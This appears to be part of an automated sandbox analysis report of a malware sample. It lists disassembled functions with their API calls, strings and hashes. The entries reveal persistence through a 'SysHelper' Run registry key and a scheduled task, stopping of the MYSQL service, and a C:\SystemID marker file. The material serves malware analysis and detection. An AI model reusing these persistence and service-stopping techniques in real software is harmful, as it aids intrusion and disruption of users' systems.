                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                        • Opcode ID: f1d274ccdd8de19da3fdf72dccf27d325f2ae1683df34146df1f2d12126d75d9
                                                                                                                                                                        • Instruction ID: fda63fe9db19cc9b848c4bb9679fcbed98681c3f119f511e9701d0fe40dc5f80
                                                                                                                                                                        • Opcode Fuzzy Hash: f1d274ccdd8de19da3fdf72dccf27d325f2ae1683df34146df1f2d12126d75d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A318935A402099BDB20DFBADC467EE77F8DF44721F1046A5E815E71E1EB709D408B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE4AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                          • Part of subcall function 00BBBDCC: _vfprintf_helper.LIBCMT ref: 00BBBDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00BE4B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00BE4B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BE4BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00BE4BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BE4BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                        • Opcode ID: d27acbef24bfda17175645b57bbd76c73f2bc32d080b10129fc75e18043a739a
                                                                                                                                                                        • Instruction ID: 8973d0da480c0ada851154260e52dc7591aefca4fba3a7d2e6bbf8a6e55dd830
                                                                                                                                                                        • Opcode Fuzzy Hash: d27acbef24bfda17175645b57bbd76c73f2bc32d080b10129fc75e18043a739a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4321AF75A48340AFE770AB60CC87FEF77D8AF88701F404869B699961D0EFF494808653
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA2389
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00BA23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BA23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00BA2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • SysHelper, xrefs: 00BA23D6
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BA237F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                        • Opcode ID: 10a07bb10f2f269bb138a9b02d433f17c5268886be2f7309b1f58150dcb4540c
                                                                                                                                                                        • Instruction ID: 2a9fad6a7ca438a69f12b0cef85471de875bb1c2ca286342bd7e56a2e802b1bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 10a07bb10f2f269bb138a9b02d433f17c5268886be2f7309b1f58150dcb4540c
                                                                                                                                                                        • Instruction Fuzzy Hash: FB11177595030DAFDF10DBA0DC89FEE77BCFB04705F0045A5B519E2191DBB49A849B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB5B6E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1077091919-0
                                                                                                                                                                        • Opcode ID: 02f7b89078193026e03a93ccc56ebb4cc1427ce087d12bf7b208e32b343b931f
                                                                                                                                                                        • Instruction ID: 88249933d49c2ae08672921a958c9685db445cb1dd07f1f2d382f87aed208a3c
                                                                                                                                                                        • Opcode Fuzzy Hash: 02f7b89078193026e03a93ccc56ebb4cc1427ce087d12bf7b208e32b343b931f
                                                                                                                                                                        • Instruction Fuzzy Hash: A541F472404708AFDB21AFA4D986BFE3BE5FF04314F2041AEF51496192DBF59640DB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA8000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 98b80005ea1cfd4c5bf78362bcdeea4129fef2c208f5ed7876f74943dff4db9e
                                                                                                                                                                        • Instruction ID: 8b89014aae9aa6d3e0db7305d15d94427835733d12a5580e8abad1c3244661b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 98b80005ea1cfd4c5bf78362bcdeea4129fef2c208f5ed7876f74943dff4db9e
                                                                                                                                                                        • Instruction Fuzzy Hash: 87C15D71708609DFDB28CF48C8C19AE77E6EF46704B244969F891CBB41DB30ED558B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9DAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(00C64F6C,00000000,00000001,00C64F3C,?,?,00C5A948,000000FF), ref: 00B9DB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00B9DBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00C5A948,000000FF), ref: 00B9DBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9DC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                        • Opcode ID: a05460be3c2b00de695db82e7c93dae88b93a15f4ed9b3d69eed014a69e90a35
                                                                                                                                                                        • Instruction ID: 6778f3d5b1323e7232463fb08462d5acb4c630c1f14c444dc14b8426f854cd2d
                                                                                                                                                                        • Opcode Fuzzy Hash: a05460be3c2b00de695db82e7c93dae88b93a15f4ed9b3d69eed014a69e90a35
                                                                                                                                                                        • Instruction Fuzzy Hash: EA51F474A40209AFDB00DF94CC89FAE7BB9FF48B05F108568F505AB290DBB5A945CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00BA1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00BA1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00BA1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BA1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                        • Opcode ID: 5e208b5cce6a29b013bda5f46b1974675903fc7695e021025dac004544746d71
                                                                                                                                                                        • Instruction ID: 4d11aa72b36797231d999b1bd37ec91414652c5180bd96b4fa3f0570461adb9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e208b5cce6a29b013bda5f46b1974675903fc7695e021025dac004544746d71
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F117339A05305AFDB605B98DCC8FAF7BECDB86752F140551FA10F2180D724D985CAA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDF26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BC0CFC: std::exception::_Copy_str.LIBCMT ref: 00BC0D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDEF74: std::exception::exception.LIBCMT ref: 00BDEF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                                                                                        • Opcode ID: 5c7b74934bafee61c9bdfb17c2ef7768736e180885c72a54313649ce4086fa34
                                                                                                                                                                        • Instruction ID: fddfa323bb641090063ee8f95afb37b824878baaf0f8276250a1cbda4dc45d61
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7b74934bafee61c9bdfb17c2ef7768736e180885c72a54313649ce4086fa34
                                                                                                                                                                        • Instruction Fuzzy Hash: E911B974D4020DBBCF00FFA4C58ADDEBBBCEA04744F4085AABD2597641EB74A3498B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF5480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00BF54C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF54D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00BF54F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF5503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00BF5531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00BF555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00BF55F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                        • Opcode ID: 6d9319099e06bee4f585a0adf6ab5e4d46f3c15b019f46e3d8e4da0873d33782
                                                                                                                                                                        • Instruction ID: a053f3a33f354d1769e40be1091f16b31880361323f42d2bb8ade4cc28954c51
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d9319099e06bee4f585a0adf6ab5e4d46f3c15b019f46e3d8e4da0873d33782
                                                                                                                                                                        • Instruction Fuzzy Hash: D3515835A40709BBEB306BA48C43FBE77E9EF55B11F0440A5FB01BB1C2DAA15D0586A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB0FDD: __wfsopen.LIBCMT ref: 00BB0FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 00B9C7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9C89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00B9C94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        • Opcode ID: eb039a6cb599d6fd09250d4653c57f625fd049931e37004d2bf4f2bacd8c4dfc
                                                                                                                                                                        • Instruction ID: b1c9ced61109202d6031c884d03ece7bce39d7a48d840be3a2c3e63d0e65c5f6
                                                                                                                                                                        • Opcode Fuzzy Hash: eb039a6cb599d6fd09250d4653c57f625fd049931e37004d2bf4f2bacd8c4dfc
                                                                                                                                                                        • Instruction Fuzzy Hash: CA918D72D002199BDF21DFA8CC857EEBBF5EF14304F1405B9E809A7241E776AA44CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00B9F338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00B9F353
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
